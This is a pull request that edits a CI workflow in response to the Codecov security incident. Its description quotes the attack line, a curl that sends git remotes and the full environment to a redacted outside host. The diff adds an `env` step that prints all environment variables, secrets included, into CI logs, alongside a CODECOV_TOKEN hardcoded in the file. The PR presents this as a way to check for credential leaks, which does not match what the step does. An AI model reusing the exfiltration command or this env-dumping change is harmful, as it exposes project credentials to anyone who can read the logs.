### PR TITLE
Update ci.yaml - Codecov security bulletin

### DIFF
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -226,6 +226,7 @@ jobs:
         CODECOV_TOKEN: "8545af1c-f90b-4345-92a5-0d075503ca56"
       run: |
         sudo apt-get install -y lcov
+        env
         cd build
         lcov --directory . --capture --output-file $(pwd)/coverage.info
         lcov --remove $(pwd)/coverage.info '/usr/*' --output-file $(pwd)/coverage.info


### PR DESCRIPTION
There was a security breach at codecov, where some people used `curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<redacted>/upload/v2 || true` , which exposed env data. Adding env dump to ci.yaml to dump env variables to make sure there is no credentials leaks.

[Codecov post](https://about.codecov.io/security-update/)